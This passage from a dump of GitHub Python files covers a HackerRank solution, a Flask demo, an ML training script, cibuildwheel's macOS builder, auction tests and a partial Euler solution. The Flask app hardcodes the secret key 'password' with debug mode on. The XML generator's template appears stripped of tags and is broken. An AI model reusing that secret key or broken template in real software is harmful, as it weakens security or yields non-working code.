orangeCounter += 1\n print(appleCounter)\n print(orangeCounter)\n\n\nif __name__ == '__main__':\n first_multiple_input = input().rstrip().split()\n\n s = int(first_multiple_input[0])\n\n t = int(first_multiple_input[1])\n\n second_multiple_input = input().rstrip().split()\n\n a = int(second_multiple_input[0])\n\n b = int(second_multiple_input[1])\n\n third_multiple_input = input().rstrip().split()\n\n m = int(third_multiple_input[0])\n\n n = int(third_multiple_input[1])\n\n apples = list(map(int, input().rstrip().split()))\n\n oranges = list(map(int, input().rstrip().split()))\n\n countApplesAndOranges(s, t, a, b, apples, oranges)\n","repo_name":"myahyaibrahim/personal-hackerrank-repo","sub_path":"Algorithms/apple-and-orange.py","file_name":"apple-and-orange.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37301667146","text":"from flask import Flask, request, render_template, redirect, url_for\nfrom form import Todo\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'password'\n\n@app.route(\"/\", methods=['GET','POST'])\ndef hello_world():\n request_method = request.method\n if request.method == 'POST':\n first_name = request.form['firstname']\n return redirect(url_for('name', first_name=first_name))\n return render_template('hello.html', request_method=request_method)\n\n@app.route('/')\ndef name(first_name):\n return render_template('base.html', first_name=first_name)\n\n@app.route('/todo', methods=['GET', 'POST'])\ndef todo():\n todo_form = Todo()\n if todo_form.validate_on_submit():\n print(todo_form.content.data)\n return redirect('/')\n return render_template('todo.html', form=todo_form)\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n ","repo_name":"dan4422/flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43902816786","text":"import json\nimport math\nimport os\nimport logging\nimport signal\nimport subprocess\nimport sys\nimport time\nimport wandb\nwandb.login()\n\nfrom torch import nn\nimport torch\nimport torchvision\nfrom datasets.audioset import AudiosetDataset\nfrom efficientnet.model import BarlowTwins\nfrom optmizers.lars import LARS , adjust_learning_rate\n\nfrom datasets.data_utils import collate_fn_padd_2b\nfrom utils import get_upstream_parser ,AverageMeter\n\n\ndef handle_sigusr1(signum, frame):\n os.system(f'scontrol requeue {os.getenv(\"SLURM_JOB_ID\")}')\n exit()\n\n\ndef handle_sigterm(signum, frame):\n pass\n\n\n\ndef main_worker(gpu, args):\n args.rank += gpu\n if args.rank==0:\n run = wandb.init(project=\"pytorch-demo\", config=vars(args))\n torch.distributed.init_process_group(\n backend='nccl', init_method=args.dist_url,\n world_size=args.world_size, rank=args.rank)\n stats_file=None\n if args.rank == 0:\n args.exp_dir.mkdir(parents=True, exist_ok=True)\n stats_file = open(args.exp_dir / 'stats.txt', 'a', buffering=1)\n print(' '.join(sys.argv))\n print(' '.join(sys.argv), file=stats_file)\n\n torch.cuda.set_device(gpu)\n torch.backends.cudnn.benchmark = True\n\n model = BarlowTwins(args).cuda(gpu)\n model = nn.SyncBatchNorm.convert_sync_batchnorm(model)\n \n param_weights = []\n param_biases = []\n for param in model.parameters():\n if param.ndim == 1:\n param_biases.append(param)\n else:\n param_weights.append(param)\n parameters = [{'params': param_weights}, {'params': param_biases}]\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[gpu])\n optimizer = LARS(parameters, lr=0, weight_decay=args.weight_decay,\n weight_decay_filter=True,\n lars_adaptation_filter=True)\n\n \n if args.resume:\n ckpt = torch.load(args.checkpoint_file,map_location='cpu')\n print(\"Resuming pretrain from epoch {0}\".format(ckpt['epoch']))\n start_epoch = ckpt['epoch']\n model.load_state_dict(ckpt['model'])\n optimizer.load_state_dict(ckpt['optimizer'])\n else:\n start_epoch = 0\n\n \n dataset = AudiosetDataset() # ! rewrite this \n sampler = torch.utils.data.distributed.DistributedSampler(dataset)\n assert args.batch_size % args.world_size == 0\n per_device_batch_size = args.batch_size // args.world_size\n loader = torch.utils.data.DataLoader(\n dataset, batch_size=per_device_batch_size, num_workers=args.workers,\n pin_memory=True, sampler=sampler,collate_fn = collate_fn_padd_2b)\n\n scaler = torch.cuda.amp.GradScaler()\n if args.rank == 0:\n print(\"Starting To Train\")\n wandb.watch(model, log=\"all\", log_freq=10)\n for epoch in range(start_epoch, args.epochs):\n sampler.set_epoch(epoch)\n train_one_epoch(epoch,model,optimizer,loader,scaler,args,gpu,stats_file)\n \n # if args.rank == 0:\n # save checkpoint \n # torch.save({'epoch': epoch + 1,\n # 'model': model.state_dict(),\n # 'optimizer' : optimizer.state_dict()},\n # args.exp_dir / 'checkpoints' / ('checkpoint_' + str(epoch + 1) + '.pth'))\n if args.rank==0:\n run.finish()\n\ndef train_one_epoch(epoch,model,optimizer,loader,scaler,args,gpu,stats_file):\n # per epoch stats\n batch_time = AverageMeter()\n losses = AverageMeter()\n on_diag_losses = AverageMeter()\n off_diag_losses = AverageMeter()\n data_time = AverageMeter()\n end = time.time()\n for step, (y1, y2) in enumerate(loader,start=epoch * len(loader)): \n data_time.update(time.time() - end)\n\n y1 = y1.cuda(gpu, non_blocking=True)\n y2 = y2.cuda(gpu, non_blocking=True)\n adjust_learning_rate(args, optimizer, loader, step)\n optimizer.zero_grad()\n with torch.cuda.amp.autocast():\n loss,on_diag,off_diag = model.forward(y1, y2)\n scaler.scale(loss).backward()\n scaler.step(optimizer)\n scaler.update()\n\n \n losses.update(loss, y1.size(0))\n on_diag_losses.update(on_diag,y1.size(0))\n off_diag_losses.update(off_diag,y1.size(0))\n batch_time.update(time.time() - end)\n end = time.time()\n\n if args.rank == 0:\n wandb.log({\"epoch\": epoch, \"instant_loss\": loss}, step=step)\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Time: {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data: {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss: {loss.val:.4f} ({loss.avg:.4f})'\n .format(epoch, step%len(loader), len(loader), batch_time=batch_time,data_time=data_time, loss=losses))\n\n if step % args.print_freq == 0:\n if args.rank == 0:\n wandb.log({\"lr_weights\" :optimizer.param_groups[0]['lr'] ,\n \"lr_biases\" :optimizer.param_groups[1]['lr'],\n }, step=step)\n if args.rank == 0:\n wandb.log({\"loss_epoch\":losses.avg , \"on_diag_loss\": on_diag_losses.avg,\n \"off_diag_loss\" : off_diag_losses.avg },step=(epoch+1)*len(loader))\n return losses.avg\n\n\n\ndef main():\n parser=get_upstream_parser()\n args = parser.parse_args()\n args.ngpus_per_node = torch.cuda.device_count()\n \n # single-node distributed training\n args.rank = 0\n args.dist_url = 'tcp://localhost:58362'\n args.world_size = args.ngpus_per_node\n torch.multiprocessing.spawn(main_worker, (args,), args.ngpus_per_node)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"svkatta/BarlowTwins","sub_path":"main_upstream.py","file_name":"main_upstream.py","file_ext":"py","file_size_in_byte":5641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36921876806","text":"\"\"\"\n\n \n %s\n %s\n %s\n %s\n %s\n %s\n \n %s\n %s\n \n %s\n \n\n\"\"\"\n\n\ndef convert_row(row):\n return \"\"\"\n %s\n %s\n %s\n %s\n %s\n %s\n \n %s\n %s\n \n %s\n %s\n %s\n\"\"\" % (\n row.transaction_date, row.reseller_id, row.id, row.event_id, row.organizer_id, row.number_of_purchased_tickets,\n row.total_amount, row.sales_channel, row.customer_first_name, row.customer_last_name, row.transaction_date,\n row.reseller_id, row.transaction_date)\n\n\ndef get_xml(df):\n xml = '\\n'.join(df.apply(convert_row, axis=1))\n xml = '\\n' + xml + '\\n'\n return xml\n\n# print('\\n'.join([convert_row(row) for row in data[1:]]))\n","repo_name":"nikhilcss97/Data-Pipeline-for-an-event-ticketing-platform","sub_path":"src/data_generation/final_data_scripts/generate_xml.py","file_name":"generate_xml.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"11460295125","text":"from sys import argv, exit\nimport csv\n\n# Checking if the command line arguement is valid (=3), if not, printing error message.\nif len(argv) != 3:\n print(\"Invalid Command line Arguement. Try again!!\")\n exit(1)\n\n# open the CSV file and DNA sequence , read contents into memory(Pythons CSV module reader and dictreader can be helpful), storing dna sequence into a string\n# argv[0] is the name of the file. the name \"python\" is not command line arguement\n# reading the sequences and storing in the string\nwith open(argv[2], \"r\") as dna_sequence_file:\n dna_sequence_file_reader = csv.reader(dna_sequence_file)\n for row in dna_sequence_file_reader:\n dna_list = row\n print(dna_list)\n\n# copying the list into dictionaries\ndna = dna_list[0]\nprint(dna)\n\n\n# accessing the textfile and getting the DNA sequenes\nwith open(argv[1], \"r\") as text_file:\n text_file_reader = csv.reader(text_file)\n\n # the pop(0) will remove the first element in the row\n for row in text_file_reader:\n person_dna_sequence = row\n person_dna_sequence.pop(0)\n # print(person_dna_sequence)\n break\n# copying the above list into a dictionary\nsequences = {}\n\n# print(sequences)\nfor number in person_dna_sequence:\n sequences[number] = 1\n\nprint (sequences)\n\n# iterating over the seqences. if the repetitions of the values from sequence dictionary are founf, it counts them\nfor key in sequences:\n max_str = 0\n cur_max_str = 0\n for i in range(len(dna)):\n\n # to make sure that maxstr is not the summation of total strs in the list but the maximum number of times it repeats continuously,\n # if cur_str is greater than 0, we skip to the end\n while cur_max_str > 0:\n cur_max_str -= 1\n\n # print(f\"current maximum 1 = {cur_max_str}\")\n continue\n\n # if the dna sequence matches the key and the is a continous repeatation, incrementing the cur_str\n if dna[i: i + len(key)] == key:\n while dna[i - len(key): i] == dna[i: i + len(key)]:\n cur_max_str += 1\n\n # print(f\"current maximum 2 = {cur_max_str}\")\n i += len(key)\n\n # comparing the cur_max_str and if it is higher than the max_str, setting it as the max_str\n if cur_max_str > max_str:\n max_str = cur_max_str\n\n # setting the max_str in the dictionary using the correspong key\n sequences[key] += max_str\n\n# print(sequences)\n\n# opening the CSV file again and iterating over it to compare the dna. if dna is matched, printing the corresponding name if not printng no match\nwith open(argv[1]) as text_file:\n text_file_reader = csv.DictReader(text_file)\n for person in text_file_reader:\n match = 0\n\n # comparing the dna and if match is found, printing the name. if not priting \"no match\"\n for dna in sequences:\n if sequences[dna] == int(person[dna]):\n match += 1\n if match == len(sequences):\n print(person['name'])\n exit(0)\n print(\"No match\")","repo_name":"thapaSujit/CS50","sub_path":"Pset 6/python/dna/dna.py","file_name":"dna.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27260254848","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom Weigfun import Weigfun\n\ndef HBVMod( Par,forcing):\n\t#HBVpareto Calculates values of 3 objective functions for HBV model\n\n Imax=Par[0]\n Ce=Par[1]\n Sumax=Par[2]\n beta=Par[3]\n Pmax = Par[4]\n #D=Par[4]\n Tlag=Par[5]\n Kf=Par[6]\n Ks=Par[7]\n\n\n Qo=forcing[:,0]\n Prec=forcing[:,1]\n Etp=forcing[:,2]\n\n\n tmax=len(Prec)\n Si=np.zeros(tmax)\n Su=np.zeros(tmax)\n Sf=np.zeros(tmax)\n Ss=np.zeros(tmax) \n Eidt=np.zeros(tmax)\n Eadt=np.zeros(tmax)\n Qtotdt=np.zeros(tmax)\n\n Si[0]=0\n Su[0]=0\n Sf[0]=0\n Ss[0]=0\n\n dt=1\n\n\t#\n\t# Model 1 SOF1\n for i in range(0,tmax):\n Pdt=Prec[i]*dt\n Epdt=Etp[i]*dt\n\t # Interception Reservoir\n if Pdt>0:\n Si[i]=Si[i]+Pdt\n Pedt=max(0,Si[i]-Imax)\n Si[i]=Si[i]-Pedt\n Eidt[i]=0\n else:\n\t\t# Evaporation only when there is no rainfall\n Pedt=0\n Eidt[i]=min(Epdt,Si[i])\n Si[i]=Si[i]-Eidt[i]\n\t \n if i0:\n rho=(Su[i]/Sumax)**beta \n Su[i]=Su[i]+(1-rho)*Pedt\n Qufdt=rho*Pedt\n else:\n Qufdt=0\n\t \n\t # Transpiration\n Epdt=max(0,Epdt-Eidt[i])\n Eadt[i]=Epdt*(Su[i]/(Sumax*Ce))\n Eadt[i]=min(Eadt[i],Su[i])\n Su[i]=Su[i]-Eadt[i]\n\t # Percolation\n #In the hillslope\n #Qusdt=D * Qufdt\n # Normal one\n Qusdt = Pmax *(Su[i]/Sumax)\n Su[i]=Su[i]-min(Qusdt,Su[i])\n if i HedgehogInDB:\n query_values = new_hedgehog.dict()\n hedgehog = await self.db.fetch_one(\n query=query.CREATE_HEDGEHOG_QUERY,\n values=query_values\n )\n return HedgehogInDB(**hedgehog)\n\n async def get_hedgehog_by_id(self, *, id: int) -> HedgehogInDB:\n hedgehog = await self.db.fetch_one(\n query=query.GET_HEDGEHOG_BY_ID_QUERY,\n values={'id': id}\n )\n if not hedgehog:\n return None\n return HedgehogInDB(**hedgehog)\n\n async def get_all_hedgehogs(self) -> List[HedgehogInDB]:\n hedgehog_records = await self.db.fetch_all(\n query=query.GET_ALL_HEDGEHOGS_QUERY)\n return [HedgehogInDB(**item) for item in hedgehog_records]\n\n async def update_hedgehog(\n self, *, id: int, hedgehog_update: HedgehogUpdate\n ) -> HedgehogInDB:\n hedgehog = await self.get_hedgehog_by_id(id=id)\n if not hedgehog:\n return None\n hedgehog_update_params = hedgehog.copy(\n update=hedgehog_update.dict(exclude_unset=True))\n if hedgehog_update_params.color_type is None:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail='Invalid color type. Cannot be None.')\n\n try:\n updated_hedgehog = await self.db.fetch_one(\n query=query.UPDATE_HEDGEHOG_BY_ID_QUERY,\n values=hedgehog_update_params.dict()\n )\n return HedgehogInDB(**updated_hedgehog)\n except Exception as e:\n print(e)\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail='Invalid update params.')\n\n async def delete_hedgehog_by_id(self, *, id: int) -> int:\n hedgehog = await self.get_hedgehog_by_id(id=id)\n if not hedgehog:\n return None\n deleted_id = await self.db.execute(\n query=query.DELETE_HEDGEHOG_BY_ID_QUERY, values={'id': id})\n return deleted_id\n","repo_name":"tenra/hedgehog","sub_path":"backend/app/db/repositories/hedgehogs.py","file_name":"hedgehogs.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21745692984","text":"import os\nimport shlex\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nfrom collections import namedtuple\nfrom glob import glob\n\nfrom .util import (\n download,\n get_build_verbosity_extra_flags,\n prepare_command,\n)\n\n\ndef call(args, env=None, cwd=None, shell=False):\n # print the command executing for the logs\n if shell:\n print('+ %s' % args)\n else:\n print('+ ' + ' '.join(shlex.quote(a) for a in args))\n\n return subprocess.check_call(args, env=env, cwd=cwd, shell=shell)\n\n\ndef get_python_configurations(build_selector):\n PythonConfiguration = namedtuple('PythonConfiguration', ['version', 'identifier', 'url'])\n python_configurations = [\n PythonConfiguration(version='2.7', identifier='cp27-macosx_x86_64', url='https://www.python.org/ftp/python/2.7.17/python-2.7.17-macosx10.9.pkg'),\n PythonConfiguration(version='3.5', identifier='cp35-macosx_x86_64', url='https://www.python.org/ftp/python/3.5.4/python-3.5.4-macosx10.6.pkg'),\n PythonConfiguration(version='3.6', identifier='cp36-macosx_x86_64', url='https://www.python.org/ftp/python/3.6.8/python-3.6.8-macosx10.9.pkg'),\n PythonConfiguration(version='3.7', identifier='cp37-macosx_x86_64', url='https://www.python.org/ftp/python/3.7.6/python-3.7.6-macosx10.9.pkg'),\n PythonConfiguration(version='3.8', identifier='cp38-macosx_x86_64', url='https://www.python.org/ftp/python/3.8.2/python-3.8.2-macosx10.9.pkg'),\n PythonConfiguration(version='2.7-v7.3.0', identifier='pp27-macosx_x86_64', url='https://bitbucket.org/pypy/pypy/downloads/pypy2.7-v7.3.0-osx64.tar.bz2'),\n PythonConfiguration(version='3.6-v7.3.0', identifier='pp36-macosx_x86_64', url='https://bitbucket.org/pypy/pypy/downloads/pypy3.6-v7.3.0-osx64.tar.bz2'),\n ]\n\n # skip builds as required\n return [c for c in python_configurations if build_selector(c.identifier)]\n\n\nSYMLINKS_DIR = '/tmp/cibw_bin'\n\n\ndef make_symlinks(installation_bin_path, python_executable, pip_executable):\n assert os.path.exists(os.path.join(installation_bin_path, python_executable))\n\n # Python bin folders on Mac don't symlink `python3` to `python`, and neither\n # does PyPy for `pypy` or `pypy3`, so we do that so `python` and `pip` always\n # point to the active configuration.\n if os.path.exists(SYMLINKS_DIR):\n shutil.rmtree(SYMLINKS_DIR)\n os.makedirs(SYMLINKS_DIR)\n\n os.symlink(os.path.join(installation_bin_path, python_executable), os.path.join(SYMLINKS_DIR, 'python'))\n os.symlink(os.path.join(installation_bin_path, python_executable + '-config'), os.path.join(SYMLINKS_DIR, 'python-config'))\n os.symlink(os.path.join(installation_bin_path, pip_executable), os.path.join(SYMLINKS_DIR, 'pip'))\n\n\ndef install_cpython(version, url):\n installed_system_packages = subprocess.check_output(['pkgutil', '--pkgs'], universal_newlines=True).splitlines()\n\n # if this version of python isn't installed, get it from python.org and install\n python_package_identifier = 'org.python.Python.PythonFramework-{}'.format(version)\n if python_package_identifier not in installed_system_packages:\n # download the pkg\n download(url, '/tmp/Python.pkg')\n # install\n call(['sudo', 'installer', '-pkg', '/tmp/Python.pkg', '-target', '/'])\n # patch open ssl\n if version == '3.5':\n open_ssl_patch_url = 'https://github.com/mayeut/patch-macos-python-openssl/releases/download/v1.0.2t/patch-macos-python-%s-openssl-v1.0.2t.tar.gz' % version\n download(open_ssl_patch_url, '/tmp/python-patch.tar.gz')\n call(['sudo', 'tar', '-C', '/Library/Frameworks/Python.framework/Versions/{}/'.format(version), '-xmf', '/tmp/python-patch.tar.gz'])\n\n installation_bin_path = '/Library/Frameworks/Python.framework/Versions/{}/bin'.format(version)\n python_executable = 'python3' if version[0] == '3' else 'python'\n pip_executable = 'pip3' if version[0] == '3' else 'pip'\n make_symlinks(installation_bin_path, python_executable, pip_executable)\n\n return installation_bin_path\n\n\ndef install_pypy(version, url):\n pypy_tar_bz2 = url.rsplit('/', 1)[-1]\n assert pypy_tar_bz2.endswith(\".tar.bz2\")\n pypy_base_filename = os.path.splitext(os.path.splitext(pypy_tar_bz2)[0])[0]\n installation_path = os.path.join('/tmp', pypy_base_filename)\n if not os.path.exists(installation_path):\n download(url, os.path.join(\"/tmp\", pypy_tar_bz2))\n call(['tar', '-C', '/tmp', '-xf', os.path.join(\"/tmp\", pypy_tar_bz2)])\n\n # fix PyPy 7.3.0 bug resulting in wrong macOS platform tag\n if version.endswith(\"-v7.3.0\") and version[0] == '3':\n patch_file = os.path.abspath(os.path.join(os.path.dirname(__file__), 'resources', 'pypy3.6.patch'))\n sysconfigdata_file = os.path.join(installation_path, 'lib_pypy', '_sysconfigdata.py')\n call(['patch', sysconfigdata_file, patch_file, '-N']) # Always has nonzero return code\n\n installation_bin_path = os.path.join(installation_path, 'bin')\n python_executable = 'pypy3' if version[0] == '3' else 'pypy'\n pip_executable = 'pip3' if version[0] == '3' else 'pip'\n make_symlinks(installation_bin_path, python_executable, pip_executable)\n\n return installation_bin_path\n\n\ndef build(project_dir, output_dir, test_command, before_test, test_requires, test_extras, before_build, build_verbosity, build_selector, repair_command, environment):\n abs_project_dir = os.path.abspath(project_dir)\n temp_dir = tempfile.mkdtemp(prefix='cibuildwheel')\n built_wheel_dir = os.path.join(temp_dir, 'built_wheel')\n repaired_wheel_dir = os.path.join(temp_dir, 'repaired_wheel')\n\n python_configurations = get_python_configurations(build_selector)\n\n get_pip_url = 'https://bootstrap.pypa.io/get-pip.py'\n get_pip_script = '/tmp/get-pip.py'\n\n # get latest pip once and for all\n download(get_pip_url, get_pip_script)\n\n for config in python_configurations:\n if config.identifier.startswith('cp'):\n installation_bin_path = install_cpython(config.version, config.url)\n elif config.identifier.startswith('pp'):\n installation_bin_path = install_pypy(config.version, config.url)\n else:\n raise ValueError(\"Unknown Python implementation\")\n\n env = os.environ.copy()\n env['PATH'] = os.pathsep.join([\n SYMLINKS_DIR,\n installation_bin_path,\n env['PATH'],\n ])\n\n # Fix issue with site.py setting the wrong `sys.prefix`, `sys.exec_prefix`,\n # `sys.path`, ... for PyPy: https://foss.heptapod.net/pypy/pypy/issues/3175\n # Also fix an issue with the shebang of installed scripts inside the\n # testing virtualenv- see https://github.com/theacodes/nox/issues/44 and\n # https://github.com/pypa/virtualenv/issues/620\n # Also see https://github.com/python/cpython/pull/9516\n env.pop('__PYVENV_LAUNCHER__', None)\n env = environment.as_dictionary(prev_environment=env)\n\n # check what version we're on\n call(['which', 'python'], env=env)\n call(['python', '--version'], env=env)\n which_python = subprocess.check_output(['which', 'python'], env=env, universal_newlines=True).strip()\n if which_python != '/tmp/cibw_bin/python':\n print(\"cibuildwheel: python available on PATH doesn't match our installed instance. If you have modified PATH, ensure that you don't overwrite cibuildwheel's entry or insert python above it.\", file=sys.stderr)\n exit(1)\n\n # install pip & wheel\n call(['python', get_pip_script], env=env, cwd=\"/tmp\")\n assert os.path.exists(os.path.join(installation_bin_path, 'pip'))\n call(['which', 'pip'], env=env)\n call(['pip', '--version'], env=env)\n which_pip = subprocess.check_output(['which', 'pip'], env=env, universal_newlines=True).strip()\n if which_pip != '/tmp/cibw_bin/pip':\n print(\"cibuildwheel: pip available on PATH doesn't match our installed instance. If you have modified PATH, ensure that you don't overwrite cibuildwheel's entry or insert pip above it.\", file=sys.stderr)\n exit(1)\n call(['pip', 'install', '--upgrade', 'setuptools', 'wheel', 'delocate'], env=env)\n\n # setup target platform, only required for python 3.5\n if config.version == '3.5':\n if '_PYTHON_HOST_PLATFORM' not in env:\n # cross-compilation platform override\n env['_PYTHON_HOST_PLATFORM'] = 'macosx-10.9-x86_64'\n if 'ARCHFLAGS' not in env:\n # https://github.com/python/cpython/blob/a5ed2fe0eedefa1649aa93ee74a0bafc8e628a10/Lib/_osx_support.py#L260\n env['ARCHFLAGS'] = '-arch x86_64'\n if 'MACOSX_DEPLOYMENT_TARGET' not in env:\n env['MACOSX_DEPLOYMENT_TARGET'] = '10.9'\n\n # run the before_build command\n if before_build:\n before_build_prepared = prepare_command(before_build, project=abs_project_dir)\n call(before_build_prepared, env=env, shell=True)\n\n # build the wheel\n if os.path.exists(built_wheel_dir):\n shutil.rmtree(built_wheel_dir)\n os.makedirs(built_wheel_dir)\n call(['pip', 'wheel', abs_project_dir, '-w', built_wheel_dir, '--no-deps'] + get_build_verbosity_extra_flags(build_verbosity), env=env)\n built_wheel = glob(os.path.join(built_wheel_dir, '*.whl'))[0]\n\n # repair the wheel\n if os.path.exists(repaired_wheel_dir):\n shutil.rmtree(repaired_wheel_dir)\n os.makedirs(repaired_wheel_dir)\n if built_wheel.endswith('none-any.whl') or not repair_command:\n # pure Python wheel or empty repair command\n shutil.move(built_wheel, repaired_wheel_dir)\n else:\n repair_command_prepared = prepare_command(repair_command, wheel=built_wheel, dest_dir=repaired_wheel_dir)\n call(repair_command_prepared, env=env, shell=True)\n repaired_wheel = glob(os.path.join(repaired_wheel_dir, '*.whl'))[0]\n\n if test_command:\n # set up a virtual environment to install and test from, to make sure\n # there are no dependencies that were pulled in at build time.\n call(['pip', 'install', 'virtualenv'], env=env)\n venv_dir = tempfile.mkdtemp()\n call(['python', '-m', 'virtualenv', venv_dir], env=env)\n\n virtualenv_env = env.copy()\n virtualenv_env['PATH'] = os.pathsep.join([\n os.path.join(venv_dir, 'bin'),\n virtualenv_env['PATH'],\n ])\n virtualenv_env[\"__CIBW_VIRTUALENV_PATH__\"] = venv_dir\n\n # check that we are using the Python from the virtual environment\n call(['which', 'python'], env=virtualenv_env)\n\n if before_test:\n before_test_prepared = prepare_command(before_test, project=abs_project_dir)\n call(before_test_prepared, env=virtualenv_env, shell=True)\n\n # install the wheel\n call(['pip', 'install', repaired_wheel + test_extras], env=virtualenv_env)\n\n # test the wheel\n if test_requires:\n call(['pip', 'install'] + test_requires, env=virtualenv_env)\n\n # run the tests from $HOME, with an absolute path in the command\n # (this ensures that Python runs the tests against the installed wheel\n # and not the repo code)\n test_command_prepared = prepare_command(test_command, project=abs_project_dir)\n call(test_command_prepared, cwd=os.environ['HOME'], env=virtualenv_env, shell=True)\n\n # clean up\n shutil.rmtree(venv_dir)\n\n # we're all done here; move it to output (overwrite existing)\n dst = os.path.join(output_dir, os.path.basename(repaired_wheel))\n shutil.move(repaired_wheel, dst)\n","repo_name":"Chia-Network/cibuildwheel","sub_path":"cibuildwheel/macos.py","file_name":"macos.py","file_ext":"py","file_size_in_byte":11893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"12501997624","text":"from unittest import TestCase\nfrom parameterized import parameterized_class\nimport pandas as pd\nimport numpy as np\nfrom dprecs.auctions import (\n get_auction_outputs,\n get_dm_metrics,\n run_paper_auction,\n run_auction_group,\n)\n\n\nclass MockConfigs:\n def __init__(self):\n auction_cols = [\n \"eBPM\",\n \"eBPMrank\",\n \"eRPM\",\n \"price\",\n \"CTR_dm\",\n \"surplus_dm\",\n \"eRPM_dm\",\n \"CTR_dr\",\n \"surplus_dr\",\n \"eRPM_dr\",\n ]\n self.GLOBAL_PCTR = 0.05\n self.SERVER_PCTR = \"server_pCTRs\"\n self.PERSONALIZED_PCTR = \"pers_pCTRs\"\n self.BID = \"bids\"\n self.RESERVE = \"reserve\"\n self.CLICK=\"clicks\"\n self.PROBA=\"probas\"\n self.GLOBAL_AUCTION_COLS = [col + \"_global\" for col in auction_cols]\n self.SERVER_AUCTION_COLS = [col + \"_server\" for col in auction_cols]\n self.PERSONALIZED_AUCTION_COLS = [col + \"_personalized\" for col in auction_cols]\n self.GLOBAL_BOAS_CONFIGS = {}\n self.BOAS_CONFIGS = {}\n self.NUM_FINALISTS = \"num_finalists\"\n\n\n@parameterized_class(\n [\n {\n \"server_pCTRs\": pd.Series([0.1, 0.5, 0.3, 0.2, 0.01], name=\"server_pCTRs\"),\n \"clicks\": pd.Series([0, 0, 1, 0, 0], name=\"clicks\"),\n \"probas\": pd.Series([1.0, 1.0, 1.0, 1.0, 1.0], name=\"probas\"),\n \"pers_pCTRs\": pd.Series([0.2, 0.45, 0.6, 0.2, 0.05], name=\"pers_pCTRs\"),\n \"bids\": pd.Series([10.0, 1.0, 6.0, 5.0, 15.0], name=\"bids\"),\n \"reserve\": 1.0,\n \"exp_eBPMs\": pd.Series([1000, 500, 1800, 1000, 150]),\n \"exp_eBPM_ranks\": pd.Series([2, 4, 1, 3, 5]),\n \"exp_eRPMs\": pd.Series([1000, 150, 1000, 500, 1 * 1000 * 0.01]),\n \"exp_prices\": pd.Series([10, 0.3, 1 / 0.3, 2.5, 1]),\n \"exp_CTR\": pd.Series([0.2, 0.45, 0.6, 0.2, 0.05]),\n \"exp_revenue\": pd.Series([2000, 135, 2000, 500, 50]),\n \"exp_surplus\": pd.Series([0, 0.7 * 0.45, 1.6, 0.5, 0.7]),\n \"bag_configs\": [\n {\n \"bag_scores\": \"eBPM\",\n \"bag_cutoff\": 1,\n \"pvt_scores\": \"pers_eBPM\",\n \"mode\": \"g\",\n },\n ],\n \"exp_bag_ranks\": [[0, 0, 1, 0, 0]],\n \"configs\": MockConfigs(),\n },\n ]\n)\nclass TestAuction(TestCase):\n def setUp(self):\n self.df = pd.concat([self.server_pCTRs, self.pers_pCTRs, self.bids, self.clicks, self.probas], axis=1)\n self.df[self.configs.RESERVE] = self.reserve\n\n def test_get_auction_outputs(self):\n exp_outputs = [\n self.exp_eBPMs,\n self.exp_eBPM_ranks,\n self.exp_eRPMs,\n self.exp_prices,\n ]\n computed_outputs = get_auction_outputs(\n self.server_pCTRs, self.bids, self.reserve\n )\n for i, output in enumerate(exp_outputs):\n np.testing.assert_allclose(output, computed_outputs[i])\n\n def test_get_dm_metrics(self):\n exp_metrics = [self.pers_pCTRs, self.exp_surplus, self.exp_revenue]\n computed_metrics = get_dm_metrics(self.exp_prices, self.bids, self.pers_pCTRs)\n for i, output in enumerate(exp_metrics):\n np.testing.assert_allclose(output, computed_metrics[i])\n\n def test_run_paper_auction(self):\n exp_stats = [\n self.exp_eBPMs,\n self.exp_eBPM_ranks,\n self.exp_eRPMs,\n self.exp_prices,\n self.exp_CTR,\n self.exp_surplus,\n self.exp_revenue,\n ]\n exp_stats.extend(self.exp_bag_ranks)\n computed_stats = run_paper_auction(\n self.server_pCTRs,\n self.bids,\n self.pers_pCTRs,\n self.reserve,\n self.clicks,\n self.probas,\n bag_configs=self.bag_configs,\n )\n for i, output in enumerate(exp_stats):\n np.testing.assert_allclose(output, computed_stats[i])\n\n def test_run_auction_group(self):\n exp_df_shape = (5, 37)\n computed_df = run_auction_group(self.df, self.configs, run_paper_auction)\n np.testing.assert_equal(exp_df_shape, computed_df.shape)\n","repo_name":"apple/ml-dprecs","sub_path":"tests/unit_tests/test_auctions.py","file_name":"test_auctions.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"78"} +{"seq_id":"71079985532","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n################################################################################\n# Euler 39\n# Integer right triangles\n# Author: Eugene Kolo - 2014\n# Contact: www.eugenekolo.com\n\n# If p is the perimeter of a right angle triangle with integral length sides, {a,b,c}, \n# there are exactly three solutions for p = 120.\n# {20,48,52}, {24,45,51}, {30,40,50}\n# For which value of p ≤ 1000, is the number of solutions maximised?\n################################################################################\ndef solve():\n import math\n\n LIMIT = 1000\n perims = [0 for i in range(0,LIMIT+1)] # List of number of solutions per perimeter\n for a in 